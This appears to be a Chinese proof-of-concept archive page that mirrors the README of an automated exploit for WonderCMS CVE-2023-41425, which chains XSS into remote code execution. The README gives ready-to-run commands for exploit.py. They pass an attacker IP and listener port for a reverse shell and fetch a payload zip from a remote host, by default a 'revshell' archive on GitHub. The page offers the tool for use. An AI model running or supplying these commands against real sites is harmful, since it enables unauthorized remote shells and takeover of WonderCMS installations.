关联漏洞
描述
WonderCMS RCE CVE-2023-41425
介绍
# RCE for WonderCMS versions v3.2.0 to v3.4.2
WonderCMS versions v3.2.0 to v3.4.2 with XSS vulnerability allow a malicious actor to achieve RCE by uploading a component to the installModule CVE-2023-41425 (No need to know the password).
## Features:
- Automated exploitation of CVE-2023-41425
- Ease of specifying the remote host where the zip is downloaded from
## Usage/Examples
Specifying the remote host from where the main.zip file is downloaded
```
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
```
OR
not specifying the main.zip file. By default, it downloads from [main.zip](https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip)
```
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
```
## Screenshots


## 🔗 Links
[](https://insomnia-jacob.github.io/me/)
[](https://www.youtube.com/@Insomnia-dev)
[](https://x.com/intent/follow?screen_name=insomniadev_)
[](https://www.instagram.com/insomnia.py/)
[](https://app.hackthebox.com/users/1974102)
文件快照
[4.0K] /data/pocs/1fbeb00c6e0ce42766e884f2d6635a41b5cff461
├── [3.9K] exploit.py
├── [4.0K] img
│ ├── [ 69K] 1.png
│ └── [ 28K] 2.png
├── [2.6K] main.zip
└── [1.6K] README.md
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。